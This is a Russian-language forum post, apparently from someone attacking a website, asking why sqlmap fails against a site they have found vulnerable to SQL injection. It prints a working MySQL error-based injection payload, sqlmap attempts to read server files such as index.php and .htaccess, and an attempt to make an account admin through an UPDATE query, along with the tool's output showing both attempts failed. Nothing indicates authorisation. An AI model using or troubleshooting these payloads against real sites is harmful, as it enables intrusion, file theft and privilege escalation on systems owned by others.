Имеется сайт с sql-injections, но возникли впоросы с sqlmap
Код:
[Linux Debian] [Apache 2.4.10] [MySQL 5.0] ['10.0.16-MariaDB-1']
Privilege: USAGE
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace
Payload: http://site.com/news.html?id=(SELECT 1582 FROM(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1582=1582,1))),0x71706b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&cat=main
Не работает --file-read="/home/www/wwuser/user/www/index.php" (или тот же .htaccess, js не важно)
Выдает пустой файл:
.SpoilerTarget" type="button">Spoiler: Результат
Код:
[WARNING] reflective value(s) found and filtering out
[INFO] retrieved:
[WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
files saved to [1]:[*] C:\sqlmap\output\site.com\files\_home_www_wwuser_user_www_index.php (size differs from remote file)
И тот же вопрос по --sql-query="UPDATE users SET admin=1 WHERE login=test" (как только не пробовал)
.SpoilerTarget" type="button">Spoiler: Результат
Код:
[WARNING] execution of custom SQL queries is only available when stacked queries are supported
UPDATE UPDATE users SET admin=1 WHERE login=test: None
[INFO] fetched data logged to text files under 'C:\sqlmap\output\site.com\'
Это из-за нехватки прав? Или что то другое мешает?